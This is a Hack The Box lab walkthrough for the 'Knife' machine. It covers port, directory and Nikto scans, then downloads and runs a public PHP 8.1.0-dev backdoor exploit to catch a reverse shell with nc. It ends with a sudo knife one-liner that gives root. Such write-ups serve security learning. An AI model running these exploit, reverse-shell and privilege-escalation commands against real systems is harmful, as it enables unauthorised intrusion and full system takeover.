Hackthebox Knife Walkthrough Link to heading
Initial Enumeration Link to heading
Port Scan Link to heading
sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.242 127 ⨯
sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.242
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:19 EDT
Nmap scan report for 10.10.10.242
Host is up (0.066s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:19 EDT
Warning: 10.10.10.242 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.242
Host is up (0.049s latency).
All 65535 scanned ports on 10.10.10.242 are open|filtered (65483) or closed (52)
Nmap done: 1 IP address (1 host up) scanned in 46.51 seconds
Vulnarabilty Scan Link to heading
nmap -Pn -p 22,80 -sC -sV -oN details.txt 10.10.10.242
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:41 EDT
Nmap scan report for 10.10.10.242
Host is up (0.044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds
Directory Scan Link to heading
Website Front end:
gobuster dir -u http://10.10.10.242 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.242
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/05/12 20:58:18 Starting gobuster in directory enumeration mode
/server-status (Status: 403) [Size: 277]
===============================================================
2022/05/12 21:14:27 Finished
Nikto Scan Link to heading
nikto -h http://10.10.10.242
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.242
+ Target Hostname: 10.10.10.242
+ Target Port: 80
+ Start Time: 2022-05-12 21:09:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 7863 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-05-12 21:16:35 (GMT-4) (410 seconds)
Hints for exploitation Link to heading
Hint Link to heading
From the Nikto scan we can see the website is powered by php8.1.0-dev
Retrieved x-powered-by header: PHP/8.1.0-dev
Searching for Possible Vulnarabilities Link to heading
searchsploit php 8.1.0-dev
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Concrete5 CMS < 8.3.0 - Username / Comments Enumeration | php/webapps/44194.py
cPanel < 11.25 - Cross-Site Request Forgery (Add User PHP Script) | php/webapps/17330.html
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
FileRun < 2017.09.18 - SQL Injection | php/webapps/42922.py
Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities | php/webapps/15571.txt
FreePBX < 13.0.188 - Remote Command Execution (Metasploit) | php/remote/40434.rb
IceWarp Mail Server < 11.1.1 - Directory Traversal | php/webapps/44587.txt
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities | php/webapps/46956.txt
Kaltura < 13.2.0 - Remote Code Execution | php/webapps/43028.py
Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities | php/webapps/39563.txt
Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit) | php/webapps/45083.rb
NPDS < 08.06 - Multiple Input Validation Vulnerabilities | php/webapps/32689.txt
OPNsense < 19.1.1 - Cross-Site Scripting | php/webapps/46351.txt
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
After searching we could see using this scriptwe can take the initial shell of the system.
Initial Shell Access Link to heading
wget https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py
--2022-05-12 22:00:16-- https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2318 (2.3K) [text/plain]
Saving to: ‘revshell_php_8.1.0-dev.py’
revshell_php_8.1.0-dev.py 100%[========================================================================================>] 2.26K --.-KB/s in 0s
2022-05-12 22:00:17 (45.6 MB/s) - ‘revshell_php_8.1.0-dev.py’ saved [2318/2318]
┌──(rocky㉿kali)-[~/hckbox/knife]
└─$ python3 revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.2 8989
Reverse shell
rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.242] 36442
bash: cannot set terminal process group (974): Inappropriate ioctl for device
bash: no job control in this shell
whoami
whoami
james
id
id
uid=1000(james) gid=1000(james) groups=1000(james)
hostname
hostname
knife
james@knife:/$
Privilege Escalation Link to heading
python3 -c 'import pty; pty.spawn("/bin/sh")'
sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
ls -al /usr/bin/knife
ls -al /usr/bin/knife
lrwxrwxrwx 1 root root 31 May 7 2021 /usr/bin/knife -> /opt/chef-workstation/bin/knife
It says the user ‘james’ can run the file ‘knife’ as root and without knowing root passowrd.
Refer this GTFObin page about knife.
cd /home/james
cd /home/james
ls
ls
user.txt
sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
whoami
whoami
james
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
whoami
whoami
root
cd /root
cd /root
ls
ls
delete.sh root.txt snap
ls -al
ls -al
total 56
drwx------ 7 root root 4096 May 18 2021 .
drwxr-xr-x 20 root root 4096 May 18 2021 ..
lrwxrwxrwx 1 root root 9 May 8 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3137 May 7 2021 .bashrc
drwx------ 2 root root 4096 May 7 2021 .cache
drwx------ 3 root root 4096 May 18 2021 .chef
-rwxr-xr-x 1 root root 105 May 8 2021 delete.sh
drwxr-xr-x 3 root root 4096 May 7 2021 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 1024 May 8 2021 .rnd
-r-------- 1 root root 33 May 14 00:03 root.txt
-rw-r--r-- 1 root root 66 May 8 2021 .selected_editor
drwxr-xr-x 3 root root 4096 May 6 2021 snap
drwx------ 2 root root 4096 May 6 2021 .ssh
-rw------- 1 root root 2413 May 18 2021 .viminfo
#
We have the root access and root flag.
Learning Link to heading
The box was simple if you get 2 points
using the Nikto scan if you notice the php dev versiona dn look for the exploit on the version.
Sudo -l output gives the “/usr/bin/knife” file. I was not initially knowing it’s standard service in linux. I was thinking this as custom service initially. After few searches, i got this as standard service and which lead me to GTFO sites for privilege escalation.